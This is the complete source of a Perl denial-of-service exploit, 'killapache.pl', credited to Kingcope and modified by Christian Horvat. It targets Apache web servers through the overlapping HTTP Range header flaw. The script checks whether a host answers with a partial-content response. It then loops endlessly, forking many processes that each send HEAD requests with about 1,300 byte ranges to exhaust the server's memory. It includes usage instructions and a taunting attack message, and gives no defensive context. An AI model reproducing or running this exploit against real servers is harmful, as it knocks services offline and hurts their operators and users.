killapache.pl (modified)

1. #!/usr/bin/perl
2.  
3. use IO::Socket;
4. use Parallel::ForkManager;
5.  
6. sub usage {
7.     print "Apache Remote Denial of Service (memory exhaustion)\n";
8.     print "by Kingcope, modified by Christian Horvat\n";
9.     print "usage: perl killapache.pl <host[/dir]> [numforks]\n";
10.     print "example: perl killapache.pl www.example.com/foo/bar.php 100\n";
11. }
12.  
13. sub killapache {
14.  
15.     print "### ATTACKING $ARGV[0] [using $numforks forks]\n";
16.        
17.     $pm = new Parallel::ForkManager($numforks);
18.  
19.     $|=1;
20.     srand(time());
21.     $p = "";
22.     for ($k=0;$k<1300;$k++) {
23.         $p .= ",5-$k";
24.     }
25.  
26.     for ($k=0;$k<$numforks;$k++) {
27.     my $pid = $pm->start and next;  
28.        
29.     $x = "";
30.  
31.     # directories/files are now possible
32.     my ($host,$dir)=split(/\//,$ARGV[0]);
33.     my $sock = IO::Socket::INET->new(PeerAddr => $host,
34.                                      PeerPort => "80",
35.                                      Proto    => 'tcp');
36.  
37.     $p = "HEAD /$dir HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
38.     print $sock $p;
39.  
40.     while(<$sock>) {
41.     }
42.      $pm->finish;
43.     }
44.     $pm->wait_all_children;
45.     print ":pPpPpppPpPPppPpppPp (pistol gun sounds)\n";
46. }
47.  
48.  
49.  
50.  
51. sub testapache {
52.  
53.     my ($host,$dir)=split(/\//,$ARGV[0]);
54.     my $sock = IO::Socket::INET->new(PeerAddr => $host,
55.                                      PeerPort => "80",
56.                                      Proto    => 'tcp');
57.  
58.     $p = "HEAD /$dir HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-100\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
59.  
60.     print "\r\n### Request ###\r\n".$p."\r\n";
61.  
62.     print $sock $p;
63.  
64.     $x = <$sock>;
65.  
66.     print "### returned Status Code -> ".$x."\r\n";
67.  
68.  
69.     if ($x =~ /Partial/) {
70.         print "### Host seems vulnable! -> ".$ARGV[0]."\n\n";
71.         return 1;  
72.     } else {
73.         return 0;  
74.     }
75. }
76.  
77.  
78.  
79. if ($#ARGV < 0) {
80.     usage;
81.     exit;  
82. }
83.  
84. # fixed bug, was:
85. # if ($#ARGV > 1) {
86.  
87. if ($#ARGV > 0) {
88.     $numforks = $ARGV[1];
89. } else {$numforks = 100;}
90.  
91.  
92.  
93. $v = testapache();
94. if ($v == 0) {
95.     print "### Host does not seem vulnerable. Or Redirect. Or File not found. Or Bad Request.\n### Exit.\n";
96.     exit;
97. }
98.  
99.  
100.  
101. while(1) {
102. killapache();
103. }